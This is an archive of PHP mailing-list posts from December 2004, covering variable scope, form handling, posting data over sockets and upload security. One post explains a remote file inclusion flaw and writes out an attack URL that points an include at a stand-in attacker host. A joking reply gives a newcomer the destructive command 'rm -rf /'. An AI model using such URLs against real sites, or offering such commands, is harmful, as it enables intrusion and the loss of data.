2004-12-09 Thread Jason Wong
On Friday 10 December 2004 04:48, Danny Brow wrote:
> On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
> > My best guess from skimming your code is that you need:
> >
> > global $_POST;
>
> should I put this at the top of my code with the rest of my variables?

No

> > in the function that uses $_POST.
> >
> > Or is $_POST always global anyway?
>
> No.

Yes

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design  Hosting * Internet  Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
BOFH Excuse #227:

Fatal error right in front of screen
*/




Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread John Nichel
Danny Brow wrote:
<snip>
function html_template() {
    global $item_pics1;
    if (file_exists('item.html')) {
        print "This is item_pics1" . $item_pics1;
        $html_template = $GLOBALS['html_template'];
        $html_template = str_replace('{item_pictures}', $item_pics1,
            $html_template);
        $html_template = str_replace('{title}', $GLOBALS['title'],
            $html_template);
        $html_template = str_replace('{description}',
            $GLOBALS['descrip'], $html_template);
        $html_template = str_replace('{price}', $GLOBALS['price'],
            $html_template);
        $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
            "/item.html";
        $item_fh = fopen($item_file_name, 'x+');
        fwrite($item_fh, $html_template);
    } else {
        $GLOBALS['errors'] .= "item.html template does not exsit";
    }
}

So what is the function doing or not doing?  If 'index.html' isn't in 
the same directory as the script, it will evaluate to false and the only 
code the function will execute is...

$GLOBALS['errors'] .= "item.html template does not exsit";

Maybe do a print_r ( $GLOBALS ) inside the function to make sure the 
values you're looking for are actually there.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]


Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Jason Wong
On Friday 10 December 2004 04:52, Danny Brow wrote:

OK, you never said what your problem was except to say everything works but 
the str_replace item_pics1.

Did you check $GLOBALS['errors'] after calling this function?

> function html_template() {
> global $item_pics1;
> if (file_exists('item.html')) {

Is this file supposed to be same as the one below?

> $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
> "/item.html";

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design  Hosting * Internet  Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
We are all dying -- and we're gonna be dead for a long time.
*/




Re: [PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread KJ
OK, apologies on my part, I did not correctly explain the problem which
can and has arisen from remote includes.

I'll try to explain the problem that I have come across twice in the
last couple of years both with popular software packages that I
downloaded like thousands of others and both with exactly the same
vulnerability and both resulted in my site being compromised and having
to resort to backups.

The vulnerability occurred where both applications had a variable setting
a base directory of the source code, which was used when including files
throughout the application, i.e.:

$base_url = '/home/example.com/www';
include_once ($base_url.'/config.php');

In config.php you would then have, for example:

<?php
include_once ($base_url.'/whatever.php');
...
?>

Now in each instance register globals was on and all that was needed to
compromise the site was to have a variable passed in the url to set the
base url to a remote site, which in turn output php to execute, i.e.:

http://example.com/config.php?base_url=http://myhacksite.example.com

Now, you are correct that education on how to avoid this kind of issue
is key, however that does not avoid the problem. Turning off register
globals would prevent many of these attacks, however there are still
many apps out there that require register globals to be on and there are
other ways to use this exploit with them off.

Now all I'm saying is that given the potential for damage and, from my
point of view, the little improvement that this feature actually
provides, why would you NOT have a way of disabling it. I would if I
could, and I know of others who would as well.

Any thoughts?
KJ
PS: If you gave someone that you didn't trust access to your scripts 
then you're asking for trouble, that was not my point and was not part 
of any kind of thinking towards this request.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
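
The include pattern described in the message above, next to a hardened form, as an added example that is not code from the post or from either affected package. The helper safe_include_path(), the constant APP_BASE and the temporary demo tree are hypothetical names constructed for the illustration.

```php
<?php
// Added example: constructed paths and helper names, written for a current PHP release.
//
// Pattern from the post (comments only, nothing below executes it):
//     config.php:  include_once($base_url . '/whatever.php');
// With register_globals on, a request parameter named base_url fills $base_url
// before that line runs, and include then fetches whatever it points at.
//
// Hardened form:
//   1. The base path is a constant set by the entry script. Request data cannot
//      create or overwrite a constant.
//   2. Include-only files stop when requested directly:
//          if (!defined('APP_BASE')) { http_response_code(403); exit; }
//   3. Every include target is resolved and must stay inside the base directory.

function safe_include_path(string $base, string $relative): string
{
    // Reject stream wrappers (http://, ftp://, php://, data:) and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative) || strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException('wrapper or NUL byte in include path');
    }
    $baseReal = realpath($base);
    $full = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($baseReal === false || $full === false) {
        throw new InvalidArgumentException('file does not exist');
    }
    // realpath() has already collapsed "..", so a prefix test is meaningful here.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('path escapes the base directory');
    }
    return $full;
}

// Constructed demo tree under the system temp directory.
$root = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($root . '/lib', 0700, true);
file_put_contents($root . '/lib/whatever.php', "<?php return 'local file loaded';\n");
file_put_contents($root . '/outside.php', "<?php return 'outside the base';\n");
define('APP_BASE', $root . '/lib');

$candidates = [
    'whatever.php',                                // the legitimate include
    'http://myhacksite.example.com/whatever.php',  // the post's example host
    '../outside.php',                              // traversal out of APP_BASE
    'missing.php',                                 // nothing to resolve
];
foreach ($candidates as $candidate) {
    try {
        $result = include safe_include_path(APP_BASE, $candidate);
        echo str_pad($candidate, 46), "included: $result\n";
    } catch (InvalidArgumentException $e) {
        echo str_pad($candidate, 46), 'rejected: ', $e->getMessage(), "\n";
    }
}

// Settings that govern the remote case. allow_url_include was added in PHP 5.2,
// after this thread, and is off by default: with it off, include refuses
// http:// targets even when allow_url_fopen is on.
foreach (['allow_url_fopen', 'allow_url_include'] as $key) {
    echo $key, ' = ', var_export(ini_get($key), true), "\n";
}

// Remove the demo tree.
unlink($root . '/lib/whatever.php');
unlink($root . '/outside.php');
rmdir($root . '/lib');
rmdir($root);
```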


[PHP] How to post quote/double quote mark?

2004-12-09 Thread Yao, Minghua
Hi, 

I used the following function to post a string variable "abcdef" to a PHP
program on another host:

<?php
function PostToHost($host, $path, $data_to_send) {
    $fp = fsockopen($host, 80);

    if (!$fp) {
        echo "Failed to open port";
        exit;
    }

    fputs($fp, "POST $path HTTP/1.1\n");
    fputs($fp, "Host: $host\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
    fputs($fp, "Content-length: ".strlen($data_to_send)."\n");
    fputs($fp, "Connection: close\n\n");
    fputs($fp, "$data_to_send\n");

    $res = "";
    while (!feof($fp)) {
        $res .= fgets($fp, 128);
    }

    fclose($fp);

    return $res;
}

$x = "A = \"abcdef\"";
$y = PostToHost("host/name", "/path/to/test.php", $x);
echo $y;

?>

/path/to/test.php on host/name is as follows.

<?php
echo $_POST['A'];
?>

It seemed that test.php got \"abcdef\", instead of "abcdef". Could anyone
please tell me how to pass "abcdef" to test.php?
Thanks in advance.

-Minghua





[PHP] Forms and viewing Text Area

2004-12-09 Thread Ben C
I have a form which has a text box which then stores in MySQL.  When I
write separate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?




Re: [PHP] Forms and viewing Text Area

2004-12-09 Thread Marek Kilimajer
Ben C wrote:
I have a form which has a text box which then stores in MySQL.  When I
write separate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?

put <pre> tag around it. and don't forget htmlspecialchars():

echo '<pre>' . htmlspecialchars($input) . '</pre>';


Re: [PHP] Forms and viewing Text Area

2004-12-09 Thread John Holmes
Ben C wrote:
I have a form which has a text box which then stores in MySQL.  When I
write separate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?

The line breaks are preserved. If you look at the HTML source of your 
page, you'll see that. HTML does not render line breaks, though, you 
need <br /> tags. So using nl2br() or something similar would work.

--
---John Holmes...
Amazon Wishlist: www.amazon.com/o/registry/3BEXC84AB3A5E/
php|architect: The Magazine for PHP Professionals  www.phparch.com


[PHP] baffled - please explain

2004-12-09 Thread Malcolm Mill
Hi, 
I just came across a snippet of code in a book I'm reading and I'm not
sure what point the author is trying to make.

The code is:

function my_function ( )
{
  echo 'My function was called';
}


<?php
function my_function ( )
{
?>
My function was called
<?php
}
?>

What are those single opening and closing curly braces doing in
separate <?php ?> tag blocks? What's the point?
The author says "Within a function, curly braces enclose the code
that performs the task you require. Between these braces, you can have
anything that is legal elsewhere in a PHP script" - PHP and MySQL Web
Development, 3rd Edition: Welling & Thomson.

If the point is to illustrate what this quote says, does that mean...

{
?>
My function was called
<?php
}

...is a syntactically correct code block for my_function?




Re: [PHP] baffled - please explain

2004-12-09 Thread adwin wijaya
Malcolm Mill wrote:
Hi, 
I just came across a snippet of code in a book I'm reading and I'm not
sure what point the author is trying to make.

The code is:
function my_function ( )
{
  echo 'My function was called';
}
<?php
function my_function ( )
{
?>
My function was called
<?php
}
?>

What are those single opening and closing curly braces doing in
separate <?php ?> tag blocks? What's the point?
The author says "Within a function, curly braces enclose the code
that performs the task you require. Between these braces, you can have
anything that is legal elsewhere in a PHP script" - PHP and MySQL Web
Development, 3rd Edition: Welling & Thomson.
If the point is to illustrate what this quote says, does that mean...
{
?>
My function was called
<?php
}

...is a syntactically correct code block for my_function?

It is correct but it is not suggested.
The author wants to show you that instead of using echo 'My function was 
called', you can do it that way.

but
> {
> ?>
> My function was called
> <?php
> }
is not correct :)
best regards
adwin
www.kuya-kuya.net
www.e-rhema.net


[PHP] ISP snippet

2004-12-09 Thread Brad Ciszewski
i need help to figure out the isp of a user. can anyone help me with this?



-Brad

www.BradTechnologies.com
99.9% Uptime
24/7 Support
Packages as low as 3.50 p/month!
www.BradTechnologies.com




Re: [PHP] Re: PHP Security

2004-12-09 Thread I l
the best security practice is to store the jpg file or any other uploaded 
file in your mySql database. This way you never have to worry about someone 
executing php by the url like www.example.com/pic.jpg. To view the file, the 
user would type www.example.com/veiw.php?fileID=3425433345.

You can also keep information about the file uploaded in your mysql such as 
IP address.

I can't really see any security problems here.

From: John Nichel [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security
Date: Thu, 09 Dec 2004 15:53:50 -0500

Richard Lynch wrote:
Chris Shiflett wrote:
--- Greg Donald [EMAIL PROTECTED] wrote:
http://seclists.org/lists/security-basics/2004/Dec/0080.html
Most of this is actually true.
The one statement that is unclear is the following:
   There are two kinds of flaws :
   - flaws inherent to the php language itself, as seen before, in file
   uploads.
   - danger in uploading files at all on the server, not dependent
   on the language used to handle the actual upload, but regarding
   the potential execution of uploaded files.
This may have meant hypothetically, meaning that there are two 
areas
where flaws could potentially exist - in the language or in the code. If
this was meant to suggest that there are existing flaws in the language,
then this is never justified.

I didn't find the statement to be unclear:  that kind of flaw can exist,
and it has been seen.
There was, unless I've been severely misinformed, a file upload security
bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
release?  I'm sure anybody on this list can dig out that answer as fast as
I, so I won't.  You'll learn more finding out for yourself anyway.
<snip>
I'm pretty sure Chris is one who doesn't have to dig to find out about an 
old security flaw.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]


[PHP] How do you work this thing

2004-12-09 Thread Wil Hitchman
How does this work?

RE: [PHP] How do you work this thing

2004-12-09 Thread Chris W. Parker
Wil Hitchman mailto:[EMAIL PROTECTED]
on Thursday, December 09, 2004 4:40 PM said:

 How does this work?

It needs two D size batteries.




Re: [PHP] How do you work this thing

2004-12-09 Thread Rory Browne
On Thu, 9 Dec 2004 16:42:20 -0800, Chris W. Parker [EMAIL PROTECTED] wrote:
 Wil Hitchman mailto:[EMAIL PROTECTED]
 on Thursday, December 09, 2004 4:40 PM said:
 
  How does this work?
 
 It needs two D size batteries.
 
Or three C size batteries, depending on what the heck he is on about.






Re: [PHP] ISP snippet

2004-12-09 Thread John Nichel
Brad Ciszewski wrote:
i need help to figure out the isp of a user. can anyone help me with this?
Maybe you can ask the user real nice.
--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com


Re: [PHP] How do you work this thing

2004-12-09 Thread John Nichel
Wil Hitchman wrote:
How does this work?
rm -rf /
--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com


Re: [PHP] How do you work this thing

2004-12-09 Thread Robert Cummings
On Thu, 2004-12-09 at 19:59, Rory Browne wrote:
 On Thu, 9 Dec 2004 16:42:20 -0800, Chris W. Parker [EMAIL PROTECTED] wrote:
  Wil Hitchman mailto:[EMAIL PROTECTED]
  on Thursday, December 09, 2004 4:40 PM said:
  
   How does this work?
  
  It needs two D size batteries.
  
 Or three C size batteries, depending on what the heck he is on about.

No, no, no, we want to keep the earth clean... a dynamo and pedals ought
to give him an unlimited renewable energy source.

Cheers,
Rob.
-- 
..
| InterJinn Application Framework - http://www.interjinn.com |
::
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for   |
| creating re-usable components quickly and easily.  |
`'




[PHP] Spurious newlines when requesting empty php file

2004-12-09 Thread Carl Michael Skog
Some strange results with spurious newlines inserted in the response when 
requesting a php file has led me to investigating what happens when a 
completely empty php-file is requested.



I would have thought that the response from a empty php file would also be 
empty, but, to my surprise, they consist of 3 newlines !!!



The strange thing is that I observed this behaviour on two completely unrelated 
servers.



Is this what can be expected or is it a result of misconfiguration ?



Kind regards, 

Carl Michael Skog




RE: [PHP] ISP snippet

2004-12-09 Thread Vail, Warren
I can't help but wonder if an ip trace rte could be used to help identify
the ISP?  Or Perhaps using a whois,,, doesn't some versions of whois use IP
address?  Intriguing question,,,

Warren Vail

 -Original Message-
 From: John Nichel [mailto:[EMAIL PROTECTED] 
 Sent: Thursday, December 09, 2004 5:04 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [PHP] ISP snippet
 
 
 Brad Ciszewski wrote:
  i need help to figure out the isp of a user. can anyone 
 help me with 
  this?
 
 Maybe you can ask the user real nice.
 
 -- 
 By-Tor.com
 ..it's all about the Rush
 http://www.by-tor.com
 



[PHP] Forms In PHP

2004-12-09 Thread Wil Hitchman
Hi, 

I created a web form in PHP and used a couple of email addresses.  The only 
email address that worked when I submitted to the form (for testing purposes) 
was my Yahoo address.  My AOL, hotmail and other work addresses did not work.  
Can someone tell me why?

Thanks, 

Wil

[PHP] Re: How to post quote/double quote mark?

2004-12-09 Thread Shen Kong
Hi, because your magic_quotes_gpc = on, so, do this:

$A = stripslashes($_POST['A']);

here is a function I use, maybe useful for you:

function returnInfo($info) {
    if (!get_magic_quotes_gpc()) {
        if (is_array($info)) {
            $info = array_map('trim', $info);
            return array_map('htmlspecialchars', $info);
        } else {
            return htmlspecialchars(trim($info));
        }
    } else {
        if (is_array($info)) {
            $info = array_map('trim', $info);
            $info = array_map('htmlspecialchars', $info);
            return array_map('stripslashes', $info);
        } else {
            return stripslashes(htmlspecialchars(trim($info)));
        }
    }
}

Minghua Yao wrote:
Hi, 

I used the following function to post a string variable "abcdef" to a PHP program on another host:

<?php
function PostToHost($host, $path, $data_to_send) {
    $fp = fsockopen($host, 80);

    if (!$fp) {
        echo "Failed to open port";
        exit;
    }

    fputs($fp, "POST $path HTTP/1.1\n");
    fputs($fp, "Host: $host\n");
    fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
    fputs($fp, "Content-length: ".strlen($data_to_send)."\n");
    fputs($fp, "Connection: close\n\n");
    fputs($fp, "$data_to_send\n");

    $res = "";
    while (!feof($fp)) {
        $res .= fgets($fp, 128);
    }

    fclose($fp);
    return $res;
}

$x = "A = \"abcdef\"";
$y = PostToHost("host/name", "/path/to/test.php", $x);
echo $y;
?>

/path/to/test.php on host/name is as follows.

<?php
echo $_POST['A'];
?>

It seemed that test.php got \"abcdef\", instead of "abcdef". Could anyone please tell me
how to pass "abcdef" to test.php?
Thanks in advance.
-Minghua



--
-- ShenKong ([EMAIL PROTECTED])
-- http://www.openphp.cn


Re: [PHP] Close all open tags in HTML text

2004-12-09 Thread Matt Palermo
 I would like to leave any HTML in there, but just make sure that ending 
tags exist, so it doesn't screw up the rest of the page.  Strip tags would 
just wipe out the HTML rather than allowing it and ending it safely.


Richard Lynch [EMAIL PROTECTED] wrote in message 
news:[EMAIL PROTECTED]
> Matt Palermo wrote:
>> I am allowing users to input HTML code into a textarea.  After they input
>> this, I want to output their HTML to the browser.  In order for the
>> document to be safe, I need to close all open HTML tags that have been
>> left open by the user, along with any open comments.  Is there a way to
>> take an HTML string and add closing tags and comments to it if needed?
>
> After you use http://php.net/tidy to fix the HTML, use
> http://php.net/strip_tags to rip out all but the handful of tags you
> really want to allow them to use, most especially any JavaScript they
> might shove in to attack your (and my!) server.
>
> I *think* strip_tags rips out JavaScript.   RTFM to be sure.
>
> -- 
> Like Music?
> http://l-i-e.com/artists.htm




Re[2]: [PHP] How do you work this thing

2004-12-09 Thread Tom Rogers
Hi,

Friday, December 10, 2004, 11:05:50 AM, you wrote:


RC No, no, no, we want to keep the earth clean... a dynamo and pedals ought
RC to give him an unlimited renewable energy source.


Maybe he has one with pedals and that's what he can't get to work?

-- 
regards,
Tom




Re: [PHP] Re: PHP Security

2004-12-09 Thread Chris Shiflett
--- I l [EMAIL PROTECTED] wrote:
> the best security practice is to store the jpg file or any other
> uploaded file in your mySql database. This way you never have
> to worry about someone executing php by the url like
> www.example.com/pic.jpg. To view the file, the user would type
> www.example.com/veiw.php?fileID=3425433345.

That's the best? :-)

While I have a great deal of confidence in my code as well, I find it odd
that you trust your own PHP code more than something like Apache, which
has been tested by millions of people worldwide and is very mature.

I would argue that it's more likely that you'll make a mistake in view.php
than it is that you will misconfigure Apache to process images as PHP.

Security is all about knowing what you can trust and what you cannot. A
mistrust of everything (paranoid security) is not a good solution, and
when there is a choice, the one with less risk is more secure. In this
case, I don't agree with your decision. I would put my trust in Apache.

> I can't really see any security problems here.

There are security concerns with everything, even if they're hypothetical
(e.g., even when you can't discover an exploit). Be careful not to ever
get too comfortable. :-)

Chris

=
Chris Shiflett - http://shiflett.org/

PHP Security - O'Reilly HTTP Developer's Handbook - Sams
Coming Soon http://httphandbook.org/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
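
The checks a view.php-style handler has to get right for the database approach debated above, as an added example that is not code from any poster in the thread. The table layout, the function names, the allowlist and the sample rows are constructed, and an in-memory SQLite database stands in for the MySQL table so the script runs offline.

```php
<?php
// Added example: constructed schema, names and rows. Assumes 64-bit PHP with pdo_sqlite.

const SERVABLE_TYPES = ['image/jpeg', 'image/png', 'image/gif'];

function parse_file_id($raw): ?int
{
    // Only a plain decimal string is an id. Arrays (?fileID[]=1), signs,
    // whitespace and trailing SQL are rejected before any query runs.
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,18}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

function build_response(PDO $db, $rawId): array
{
    $id = parse_file_id($rawId);
    if ($id === null) {
        return ['status' => 400, 'headers' => [], 'body' => ''];
    }
    // Bound parameter: the id never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT mime, body FROM uploads WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return ['status' => 404, 'headers' => [], 'body' => ''];
    }
    // mime is assumed to have been derived from the file's bytes at upload time,
    // not from the browser-supplied type. Anything off the allowlist is not served.
    if (!in_array($row['mime'], SERVABLE_TYPES, true)) {
        return ['status' => 415, 'headers' => [], 'body' => ''];
    }
    return [
        'status'  => 200,
        'headers' => [
            'Content-Type: ' . $row['mime'],
            'Content-Length: ' . strlen($row['body']),
            'X-Content-Type-Options: nosniff', // browser must not re-guess the type
        ],
        'body'    => $row['body'],
    ];
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE uploads (id INTEGER PRIMARY KEY, mime TEXT, body BLOB)');
$insert = $db->prepare('INSERT INTO uploads (id, mime, body) VALUES (?, ?, ?)');
$insert->execute([1, 'image/gif', 'GIF89a (constructed sample bytes)']);
$insert->execute([2, 'text/html', '<p>constructed sample</p>']);

// A real handler would call http_response_code(), header() for each entry and
// echo the body. The stored bytes are only ever echoed, never passed to
// include or eval, so their content cannot run as PHP.
$inputs = ['1', '2', '3425433345', '1 OR 1=1', '-1', ['1']];
foreach ($inputs as $input) {
    $response = build_response($db, $input);
    echo str_pad(json_encode($input), 14), ' -> ', $response['status'],
         ' ', implode('; ', $response['headers']), "\n";
}
```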



[PHP] I'm Back i'm beginner and i couldn't solve the problem

2004-12-09 Thread Mecnun
hi again, I tried all the corrections that you showed me. Nothing worked and I
uploaded my scripts to a web hosting server and I saw that my scripts run on
that server quite well.
Every script works on my machine, if I don't use $_POST[].

For example if I try to run that code:

<?php
echo 'This is a string<br>';
echo 'Arnol said that: I\'ll be back<br><br>';
?>

It runs, there is no problem, but if I run that one:

<?php
print "Welcome <b> $_POST[user] </b> <P>\n\n";
print "Your address is:<P>\n\n <b> $_POST[address] </b>";
?>

Only "Welcome" and "Your address is" are printed.
The data that I enter into the form is not received.
Do you have any idea, what kind of configuration mistake that I've done?



Re: [PHP] I'm Back i'm beginner and i couldn't solve the problem

2004-12-09 Thread Santa
10  2004 05:57 Mecnun (a):

hint - php.ini - register_globals = Off

